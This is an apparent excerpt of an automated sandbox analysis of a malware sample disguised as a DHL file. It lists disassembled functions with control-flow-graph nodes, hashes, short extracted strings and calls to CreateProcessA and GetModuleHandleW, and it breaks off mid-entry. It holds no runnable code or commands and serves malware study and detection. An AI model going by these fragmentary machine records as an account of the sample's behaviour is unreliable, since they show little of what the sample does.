                                                • API String ID: 0-3799487529
                                                • Opcode ID: c5657f123f8158e7e2297f1185183c8dcf915fb60f7f8ff84285df68440d522c
                                                • Instruction ID: a77dfe6530010b25194493b6e48d429bd7d98b5e301c50ebfbb68b5ccbdbc745
                                                • Opcode Fuzzy Hash: c5657f123f8158e7e2297f1185183c8dcf915fb60f7f8ff84285df68440d522c
                                                • Instruction Fuzzy Hash: C6426CB0A00218CFDB54DFA9C8547AEBBF6AF84300F14C569D40AAB395DF349985CFA5
                                                Function 07112C97 Relevance: 4.1, Strings: 3, Instructions: 315COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 299 7112c97-7112ca0 300 7112ca2-7112caa 299->300 301 7112cc4-7112ccc 299->301 300->301 302 7112cef-7112cf1 301->302 303 7112cce-7112cee 301->303 304 7112cf2-7112cf4 302->304 305 7112cf5-7112d1d 302->305 303->302 304->305 306 7112d24-7112d62 call 71132a0 305->306 307 7112d1f 305->307 309 7112d68 306->309 307->306 310 7112d6f-7112d8b 309->310 311 7112d94-7112d95 310->311 312 7112d8d 310->312 313 71130eb-71130f2 311->313 314 7112d9a-7112d9e 311->314 312->309 312->313 312->314 315 7112e10-7112e28 312->315 316 7112f73-7112f88 312->316 317 7112ddb-7112de4 312->317 318 711307b-71130a0 312->318 319 7112fbd-7112fc1 312->319 320 7112e7d-7112e9b 312->320 321 7112f61-7112f6e 312->321 322 7112ea0-7112eac 312->322 323 71130a5-71130b1 312->323 324 7112f47-7112f5c 312->324 325 7112dc7-7112dd9 312->325 326 7112f06-7112f26 312->326 327 7112e66-7112e78 312->327 328 7112f2b-7112f42 312->328 329 7112eca-7112eea 312->329 330 7112f8d-7112f91 312->330 331 7112fed-7112ff9 312->331 332 7112eef-7112f01 312->332 333 71130cf-71130e6 312->333 336 7112db1-7112db8 314->336 337 7112da0-7112daf 314->337 342 7112e2a 315->342 343 7112e2f-7112e45 315->343 316->310 338 7112df7-7112dfe 317->338 339 7112de6-7112df5 317->339 318->310 346 7112fc3-7112fd2 319->346 347 7112fd4-7112fdb 319->347 320->310 321->310 334 7112eb3-7112ec5 322->334 335 7112eae 322->335 340 71130b3 323->340 341 71130b8-71130ca 323->341 324->310 325->310 326->310 327->310 328->310 329->310 344 7112f93-7112fa2 330->344 345 7112fa4-7112fab 330->345 348 7113000-7113016 331->348 349 7112ffb 331->349 332->310 333->310 334->310 335->334 354 7112dbf-7112dc5 336->354 337->354 357 7112e05-7112e0b 338->357 339->357 340->341 341->310 342->343 362 7112e47 343->362 363 7112e4c-7112e61 343->363 351 7112fb2-7112fb8 344->351 345->351 352 7112fe2-7112fe8 346->352 347->352 364 7113018 348->364 365 711301d-7113033 348->365 349->348 351->310 352->310 354->310 357->310 362->363 363->310 364->365 368 7113035 365->368 369 711303a-7113050 365->369 368->369 371 7113052 369->371 372 7113057-7113076 369->372 371->372 372->310
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ry$ry$ry
                                                • API String ID: 0-128149707
                                                • Opcode ID: e71669dd3e25403b86c294e41f3017dba26e281130ed36db22734c00fdd1eec6
                                                • Instruction ID: 31174be2552fd56f994257d5609b97987f8c3fd6f866716eff76a90e95f48c96
                                                • Opcode Fuzzy Hash: e71669dd3e25403b86c294e41f3017dba26e281130ed36db22734c00fdd1eec6
                                                • Instruction Fuzzy Hash: 05D160B1E1420ADFCB18CFA5C4854AEFBB2FF89300F1585A6D411AB299D734DA42CF94
                                                Function 07112CAF Relevance: 4.1, Strings: 3, Instructions: 311COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 375 7112caf-7112ccc 377 7112cef-7112cf1 375->377 378 7112cce-7112cee 375->378 379 7112cf2-7112cf4 377->379 380 7112cf5-7112d1d 377->380 378->377 379->380 381 7112d24-7112d62 call 71132a0 380->381 382 7112d1f 380->382 384 7112d68 381->384 382->381 385 7112d6f-7112d8b 384->385 386 7112d94-7112d95 385->386 387 7112d8d 385->387 388 71130eb-71130f2 386->388 389 7112d9a-7112d9e 386->389 387->384 387->388 387->389 390 7112e10-7112e28 387->390 391 7112f73-7112f88 387->391 392 7112ddb-7112de4 387->392 393 711307b-71130a0 387->393 394 7112fbd-7112fc1 387->394 395 7112e7d-7112e9b 387->395 396 7112f61-7112f6e 387->396 397 7112ea0-7112eac 387->397 398 71130a5-71130b1 387->398 399 7112f47-7112f5c 387->399 400 7112dc7-7112dd9 387->400 401 7112f06-7112f26 387->401 402 7112e66-7112e78 387->402 403 7112f2b-7112f42 387->403 404 7112eca-7112eea 387->404 405 7112f8d-7112f91 387->405 406 7112fed-7112ff9 387->406 407 7112eef-7112f01 387->407 408 71130cf-71130e6 387->408 411 7112db1-7112db8 389->411 412 7112da0-7112daf 389->412 417 7112e2a 390->417 418 7112e2f-7112e45 390->418 391->385 413 7112df7-7112dfe 392->413 414 7112de6-7112df5 392->414 393->385 421 7112fc3-7112fd2 394->421 422 7112fd4-7112fdb 394->422 395->385 396->385 409 7112eb3-7112ec5 397->409 410 7112eae 397->410 415 71130b3 398->415 416 71130b8-71130ca 398->416 399->385 400->385 401->385 402->385 403->385 404->385 419 7112f93-7112fa2 405->419 420 7112fa4-7112fab 405->420 423 7113000-7113016 406->423 424 7112ffb 406->424 407->385 408->385 409->385 410->409 429 7112dbf-7112dc5 411->429 412->429 432 7112e05-7112e0b 413->432 414->432 415->416 416->385 417->418 437 7112e47 418->437 438 7112e4c-7112e61 418->438 426 7112fb2-7112fb8 419->426 420->426 427 7112fe2-7112fe8 421->427 422->427 439 7113018 423->439 440 711301d-7113033 423->440 424->423 426->385 427->385 429->385 432->385 437->438 438->385 439->440 443 7113035 440->443 444 711303a-7113050 440->444 443->444 446 7113052 444->446 447 7113057-7113076 444->447 446->447 447->385
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ry$ry$ry
                                                • API String ID: 0-128149707
                                                • Opcode ID: 64291422df85751ae88e640949afb94a21cfc7096fa8a72061e7f3e3475b5d1a
                                                • Instruction ID: 31e73bb394beeff98d45df54ec1a5b28d7bf0c5e41373770b670178e878a0703
                                                • Opcode Fuzzy Hash: 64291422df85751ae88e640949afb94a21cfc7096fa8a72061e7f3e3475b5d1a
                                                • Instruction Fuzzy Hash: 68D15FB1E1420ADFCB18CFA5C4854AEFBB2FF89300F558566D411AB298D734DA42CF94
                                                Function 07112CF8 Relevance: 4.0, Strings: 3, Instructions: 284COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 450 7112cf8-7112d1d 451 7112d24-7112d62 call 71132a0 450->451 452 7112d1f 450->452 454 7112d68 451->454 452->451 455 7112d6f-7112d8b 454->455 456 7112d94-7112d95 455->456 457 7112d8d 455->457 458 71130eb-71130f2 456->458 459 7112d9a-7112d9e 456->459 457->454 457->458 457->459 460 7112e10-7112e28 457->460 461 7112f73-7112f88 457->461 462 7112ddb-7112de4 457->462 463 711307b-71130a0 457->463 464 7112fbd-7112fc1 457->464 465 7112e7d-7112e9b 457->465 466 7112f61-7112f6e 457->466 467 7112ea0-7112eac 457->467 468 71130a5-71130b1 457->468 469 7112f47-7112f5c 457->469 470 7112dc7-7112dd9 457->470 471 7112f06-7112f26 457->471 472 7112e66-7112e78 457->472 473 7112f2b-7112f42 457->473 474 7112eca-7112eea 457->474 475 7112f8d-7112f91 457->475 476 7112fed-7112ff9 457->476 477 7112eef-7112f01 457->477 478 71130cf-71130e6 457->478 481 7112db1-7112db8 459->481 482 7112da0-7112daf 459->482 487 7112e2a 460->487 488 7112e2f-7112e45 460->488 461->455 483 7112df7-7112dfe 462->483 484 7112de6-7112df5 462->484 463->455 491 7112fc3-7112fd2 464->491 492 7112fd4-7112fdb 464->492 465->455 466->455 479 7112eb3-7112ec5 467->479 480 7112eae 467->480 485 71130b3 468->485 486 71130b8-71130ca 468->486 469->455 470->455 471->455 472->455 473->455 474->455 489 7112f93-7112fa2 475->489 490 7112fa4-7112fab 475->490 493 7113000-7113016 476->493 494 7112ffb 476->494 477->455 478->455 479->455 480->479 499 7112dbf-7112dc5 481->499 482->499 502 7112e05-7112e0b 483->502 484->502 485->486 486->455 487->488 507 7112e47 488->507 508 7112e4c-7112e61 488->508 496 7112fb2-7112fb8 489->496 490->496 497 7112fe2-7112fe8 491->497 492->497 509 7113018 493->509 510 711301d-7113033 493->510 494->493 496->455 497->455 499->455 502->455 507->508 508->455 509->510 513 7113035 510->513 514 711303a-7113050 510->514 513->514 516 7113052 514->516 517 7113057-7113076 514->517 516->517 517->455
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ry$ry$ry
                                                • API String ID: 0-128149707
                                                • Opcode ID: dac0f28117bdcb0f2480df660d9d70090749466843e1e136c263b87a5682da41
                                                • Instruction ID: 42ab84f81fe604c56144903ca3abb2fefb4c412bb9d8ee405d08ae6d5d1a0227
                                                • Opcode Fuzzy Hash: dac0f28117bdcb0f2480df660d9d70090749466843e1e136c263b87a5682da41
                                                • Instruction Fuzzy Hash: 7EC14BB5E1420ADFCB18CF95C4858AEFBB6FF89300F518569D412AB298D734DA42CF94
                                                Function 071196C8 Relevance: 2.7, Strings: 2, Instructions: 224COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 622 71196c8-71196ed 623 71196f4-7119725 622->623 624 71196ef 622->624 625 7119726 623->625 624->623 626 711972d-7119749 625->626 627 7119752-7119753 626->627 628 711974b 626->628 629 7119758-711979a 627->629 630 71199bf-71199c8 627->630 628->625 628->629 628->630 631 71198d3-71198fa 628->631 632 7119893-71198a6 628->632 633 7119972-7119984 628->633 634 71197b4-71197db 628->634 635 71197f7-71197fd call 7119b08 628->635 636 711995b-711996d 628->636 637 711985c-7119860 628->637 638 711979c-71197af 628->638 639 71198ff-7119912 628->639 640 711993e-7119956 628->640 641 71197e0-71197f2 628->641 642 71198c5-71198ce 628->642 643 71199a5-71199ba 628->643 644 7119844-7119857 628->644 645 7119989-71199a0 628->645 646 7119828-711983f 628->646 647 71198ab-71198c0 628->647 629->626 631->626 632->626 633->626 634->626 657 7119803-7119823 635->657 636->626 648 7119873-711987a 637->648 649 7119862-7119871 637->649 638->626 650 7119925-711992c 639->650 651 7119914-7119923 639->651 640->626 641->626 642->626 643->626 644->626 645->626 646->626 647->626 653 7119881-711988e 648->653 649->653 656 7119933-7119939 650->656 651->656 653->626 656->626 657->626
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TuA$UC;"
                                                • API String ID: 0-2071649361
                                                • Opcode ID: b302fb64189c1bfbe5303c93f247050d83b735644a425a07fcbb9b901179b0b7
                                                • Instruction ID: 39f22a9b15084f110783e8e28a768a02e71570ba1302638aeef2b4d9bb80d2ae
                                                • Opcode Fuzzy Hash: b302fb64189c1bfbe5303c93f247050d83b735644a425a07fcbb9b901179b0b7
                                                • Instruction Fuzzy Hash: CA9128B4D24209DFCB08CFA6E59159EFBB2FF89350F10A42AE525AB264D730A941CF44
                                                Function 071196C7 Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 660 71196c7-71196ed 661 71196f4-7119725 660->661 662 71196ef 660->662 663 7119726 661->663 662->661 664 711972d-7119749 663->664 665 7119752-7119753 664->665 666 711974b 664->666 667 7119758-711979a 665->667 668 71199bf-71199c8 665->668 666->663 666->667 666->668 669 71198d3-71198fa 666->669 670 7119893-71198a6 666->670 671 7119972-7119984 666->671 672 71197b4-71197db 666->672 673 71197f7-71197fd call 7119b08 666->673 674 711995b-711996d 666->674 675 711985c-7119860 666->675 676 711979c-71197af 666->676 677 71198ff-7119912 666->677 678 711993e-7119956 666->678 679 71197e0-71197f2 666->679 680 71198c5-71198ce 666->680 681 71199a5-71199ba 666->681 682 7119844-7119857 666->682 683 7119989-71199a0 666->683 684 7119828-711983f 666->684 685 71198ab-71198c0 666->685 667->664 669->664 670->664 671->664 672->664 695 7119803-7119823 673->695 674->664 686 7119873-711987a 675->686 687 7119862-7119871 675->687 676->664 688 7119925-711992c 677->688 689 7119914-7119923 677->689 678->664 679->664 680->664 681->664 682->664 683->664 684->664 685->664 691 7119881-711988e 686->691 687->691 694 7119933-7119939 688->694 689->694 691->664 694->664 695->664
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TuA$UC;"
                                                • API String ID: 0-2071649361
                                                • Opcode ID: 0884089c2d1c76a94e35763d5d2b9666f0c61c9718437f8baa1fe16c23462e80
                                                • Instruction ID: 7685f46d09bce1f363205004dee78f57f98070e5dfe80c577dc7177b7f33a48b
                                                • Opcode Fuzzy Hash: 0884089c2d1c76a94e35763d5d2b9666f0c61c9718437f8baa1fe16c23462e80
                                                • Instruction Fuzzy Hash: 539119B4D2420DEFCB08CFA5E59159EFBB2FF89350F10A42AE525AB264D730A941CF44
                                                Function 07110B3D Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: z^I
                                                • API String ID: 0-307258731
                                                • Opcode ID: 22c37fe3be022cb5cd8de8720ec7cbd49bc4df72fd97393c7eefde2a61fe4bea
                                                • Instruction ID: 942f1501ad9989d5e0e4a8ec03d350381ba1af815ef2915600a9b732bb81e6a9
                                                • Opcode Fuzzy Hash: 22c37fe3be022cb5cd8de8720ec7cbd49bc4df72fd97393c7eefde2a61fe4bea
                                                • Instruction Fuzzy Hash: 70A116B5E142198FCB08CFAAC8806DDFBB2FF8D310F24806AD415AB255D7349986CF64
                                                Function 07110B77 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: z^I
                                                • API String ID: 0-307258731
                                                • Opcode ID: 5ffe9f2ca95a87278b3f554e64be92833ea9b268a50cd5a604022e0259074098
                                                • Instruction ID: 643cb80d4fafc8afce8e4431a082979c7d2acd44a5d121defed04baa173693b7
                                                • Opcode Fuzzy Hash: 5ffe9f2ca95a87278b3f554e64be92833ea9b268a50cd5a604022e0259074098
                                                • Instruction Fuzzy Hash: 6FA1D2B4E142198FCB08CFAAC9946DEFBB2EF89300F24946AD415BB254D7349985CF54
                                                Function 07110B90 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: z^I
                                                • API String ID: 0-307258731
                                                • Opcode ID: 24cf2316d18713ae74676936f41711f5e1e10e7a4c492f1594c7f1152d24b6cd
                                                • Instruction ID: ee88a32c51dabe45939b0b5bb24d0db4749146cd4a1e398cf6a4be6c29c52f63
                                                • Opcode Fuzzy Hash: 24cf2316d18713ae74676936f41711f5e1e10e7a4c492f1594c7f1152d24b6cd
                                                • Instruction Fuzzy Hash: 4591C2B4E102198FCB08CFAAC98469EFBB2FF89300F24942AD415BB264D7349985CF54
                                                Function 07118090 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5=6
                                                • API String ID: 0-2897083178
                                                • Opcode ID: 2ba47031056ee663f88f321fdfbb23275196648f6c6d23bed7faccb4d1eb1c03
                                                • Instruction ID: a22c81705ef86d533dfd6a7b798ee57f60ec041cbb2014fa414bd113db9d49b7
                                                • Opcode Fuzzy Hash: 2ba47031056ee663f88f321fdfbb23275196648f6c6d23bed7faccb4d1eb1c03
                                                • Instruction Fuzzy Hash: D77137B4E1521A9FCB08CFA5D9414AEFBF2FF8A310F10E46AD016EB294D7749A018F54
                                                Function 071180A0 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5=6
                                                • API String ID: 0-2897083178
                                                • Opcode ID: 2b75888a324b53ef268a7d645638156c011712851c335451f2b256f0d275efa7
                                                • Instruction ID: 1f826a380be0e5fa25af33a242ed918bb05297870023525522e36836975763b9
                                                • Opcode Fuzzy Hash: 2b75888a324b53ef268a7d645638156c011712851c335451f2b256f0d275efa7
                                                • Instruction Fuzzy Hash: 76613874E1521A9FCB08CFA5D9414AEFBF2FF89310F10E46AD016EB294D7749A018F54
                                                Function 06D9BB58 Relevance: .6, Instructions: 593COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bdf7c184af7bae80b6fbe402149d003b71e0d4ca2a2c6b44642c2514517c9000
                                                • Instruction ID: d49553fca85a4e4fe0cefd9467c87a1d5ea9fa5d8d62e732e4e93359dafbbe13
                                                • Opcode Fuzzy Hash: bdf7c184af7bae80b6fbe402149d003b71e0d4ca2a2c6b44642c2514517c9000
                                                • Instruction Fuzzy Hash: FD228730B112049FDB59DB69D490BAEB7F6EF89700F2540AAE146DB3A1CB35ED01CB61
                                                Function 076E9FF1 Relevance: .3, Instructions: 276COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477163310.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_76e0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 490970136d3dde7296ad2923f93b5f3b72163e6c0fc6879a112b1f883dc59ba9
                                                • Instruction ID: 3d0824a73faed538778f7c6d7dfad66d5159569088ec5058c975926403fa0da4
                                                • Opcode Fuzzy Hash: 490970136d3dde7296ad2923f93b5f3b72163e6c0fc6879a112b1f883dc59ba9
                                                • Instruction Fuzzy Hash: 06C15DB1D01255CFCB15CFA8C8807ADBBF6AF89300F14C1AAD44AAB255EB30D985CF61
                                                Function 012B4B01 Relevance: .2, Instructions: 182COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1466853559.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12b0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94744ffa28c75c31936133ea9d66cdc27b47c923f33b1cb81f882ff01ee021b9
                                                • Instruction ID: 2583802def9a35a968080ab9bc56ad3c791df8fdaf80e5cbd4db35c5248ba935
                                                • Opcode Fuzzy Hash: 94744ffa28c75c31936133ea9d66cdc27b47c923f33b1cb81f882ff01ee021b9
                                                • Instruction Fuzzy Hash: A9513163E70D8587DB05743A8CE73EA06C5476676CF14C304931AAABE3F6DACC918386
                                                Function 07111E7A Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24ff135a8b40c017c75130c1265a20c142d1758feebf116f7502516e7a3d5111
                                                • Instruction ID: 00ec88724e09b37009acabab7d5904aa8c8a000dd4ac2e3a24237cfa91dde6bd
                                                • Opcode Fuzzy Hash: 24ff135a8b40c017c75130c1265a20c142d1758feebf116f7502516e7a3d5111
                                                • Instruction Fuzzy Hash: 873129B1E056588BDB18CFA6D8502DEFFB2BFC9300F14C06AD509AB264DB345946CF50
                                                Function 06D94774 Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 698 6d94774-6d94815 704 6d9484e-6d9486e 698->704 705 6d94817-6d94821 698->705 710 6d94870-6d9487a 704->710 711 6d948a7-6d948d6 704->711 705->704 706 6d94823-6d94825 705->706 708 6d94848-6d9484b 706->708 709 6d94827-6d94831 706->709 708->704 712 6d94833 709->712 713 6d94835-6d94844 709->713 710->711 715 6d9487c-6d9487e 710->715 719 6d948d8-6d948e2 711->719 720 6d9490f-6d949c9 CreateProcessA 711->720 712->713 713->713 714 6d94846 713->714 714->708 716 6d948a1-6d948a4 715->716 717 6d94880-6d9488a 715->717 716->711 721 6d9488c 717->721 722 6d9488e-6d9489d 717->722 719->720 723 6d948e4-6d948e6 719->723 733 6d949cb-6d949d1 720->733 734 6d949d2-6d94a58 720->734 721->722 722->722 724 6d9489f 722->724 725 6d94909-6d9490c 723->725 726 6d948e8-6d948f2 723->726 724->716 725->720 728 6d948f4 726->728 729 6d948f6-6d94905 726->729 728->729 729->729 730 6d94907 729->730 730->725 733->734 744 6d94a68-6d94a6c 734->744 745 6d94a5a-6d94a5e 734->745 747 6d94a7c-6d94a80 744->747 748 6d94a6e-6d94a72 744->748 745->744 746 6d94a60 745->746 746->744 750 6d94a90-6d94a94 747->750 751 6d94a82-6d94a86 747->751 748->747 749 6d94a74 748->749 749->747 753 6d94aa6-6d94aad 750->753 754 6d94a96-6d94a9c 750->754 751->750 752 6d94a88 751->752 752->750 755 6d94aaf-6d94abe 753->755 756 6d94ac4 753->756 754->753 755->756 758 6d94ac5 756->758 758->758
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06D949B6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 21bbfe1f7a4cae21b2a8d55cb6bbe56330995ccb63120d05cb1987c3af0385ba
                                                • Instruction ID: df7dcae2fed5578e793cf8a1d1d05f3cccaf0cfa4ea1d94ca450b40ab5c17ba4
                                                • Opcode Fuzzy Hash: 21bbfe1f7a4cae21b2a8d55cb6bbe56330995ccb63120d05cb1987c3af0385ba
                                                • Instruction Fuzzy Hash: 04A14971D002599FEF64DFA8C840BEDBBF2BF48314F148569E809A7241DB749986CFA1
                                                Function 06D94780 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 759 6d94780-6d94815 761 6d9484e-6d9486e 759->761 762 6d94817-6d94821 759->762 767 6d94870-6d9487a 761->767 768 6d948a7-6d948d6 761->768 762->761 763 6d94823-6d94825 762->763 765 6d94848-6d9484b 763->765 766 6d94827-6d94831 763->766 765->761 769 6d94833 766->769 770 6d94835-6d94844 766->770 767->768 772 6d9487c-6d9487e 767->772 776 6d948d8-6d948e2 768->776 777 6d9490f-6d949c9 CreateProcessA 768->777 769->770 770->770 771 6d94846 770->771 771->765 773 6d948a1-6d948a4 772->773 774 6d94880-6d9488a 772->774 773->768 778 6d9488c 774->778 779 6d9488e-6d9489d 774->779 776->777 780 6d948e4-6d948e6 776->780 790 6d949cb-6d949d1 777->790 791 6d949d2-6d94a58 777->791 778->779 779->779 781 6d9489f 779->781 782 6d94909-6d9490c 780->782 783 6d948e8-6d948f2 780->783 781->773 782->777 785 6d948f4 783->785 786 6d948f6-6d94905 783->786 785->786 786->786 787 6d94907 786->787 787->782 790->791 801 6d94a68-6d94a6c 791->801 802 6d94a5a-6d94a5e 791->802 804 6d94a7c-6d94a80 801->804 805 6d94a6e-6d94a72 801->805 802->801 803 6d94a60 802->803 803->801 807 6d94a90-6d94a94 804->807 808 6d94a82-6d94a86 804->808 805->804 806 6d94a74 805->806 806->804 810 6d94aa6-6d94aad 807->810 811 6d94a96-6d94a9c 807->811 808->807 809 6d94a88 808->809 809->807 812 6d94aaf-6d94abe 810->812 813 6d94ac4 810->813 811->810 812->813 815 6d94ac5 813->815 815->815
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06D949B6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 780f99931a49ec8a22e079e34341d64c164634f864242d9031833b857f13f6b0
                                                • Instruction ID: 636f6807dde6fd8e0905ddfdf17ea35787367ab6737126c4d72d42f55ec13246
                                                • Opcode Fuzzy Hash: 780f99931a49ec8a22e079e34341d64c164634f864242d9031833b857f13f6b0
                                                • Instruction Fuzzy Hash: B8913871D002599FEF64DFA8C840BEDBBF2BF48314F148569D809A7241DB749986CFA1
                                                Function 012BAE48 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 816 12bae48-12bae57 817 12bae59-12bae66 call 12ba1a0 816->817 818 12bae83-12bae87 816->818 823 12bae68 817->823 824 12bae7c 817->824 820 12bae9b-12baedc 818->820 821 12bae89-12bae93 818->821 827 12baee9-12baef7 820->827 828 12baede-12baee6 820->828 821->820 871 12bae6e call 12bb0d1 823->871 872 12bae6e call 12bb0e0 823->872 824->818 829 12baf1b-12baf1d 827->829 830 12baef9-12baefe 827->830 828->827 835 12baf20-12baf27 829->835 832 12baf09 830->832 833 12baf00-12baf07 call 12ba1ac 830->833 831 12bae74-12bae76 831->824 834 12bafb8-12bb078 831->834 839 12baf0b-12baf19 832->839 833->839 866 12bb07a-12bb07d 834->866 867 12bb080-12bb0ab GetModuleHandleW 834->867 837 12baf29-12baf31 835->837 838 12baf34-12baf3b 835->838 837->838 842 12baf48-12baf51 call 12ba1bc 838->842 843 12baf3d-12baf45 838->843 839->835 847 12baf5e-12baf63 842->847 848 12baf53-12baf5b 842->848 843->842 850 12baf81-12baf8e 847->850 851 12baf65-12baf6c 847->851 848->847 857 12bafb1-12bafb7 850->857 858 12baf90-12bafae 850->858 851->850 852 12baf6e-12baf7e call 12ba1cc call 12ba1dc 851->852 852->850 858->857 866->867 868 12bb0ad-12bb0b3 867->868 869 12bb0b4-12bb0c8 867->869 868->869 871->831 872->831
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 012BB09E
                                                Memory Dump Source
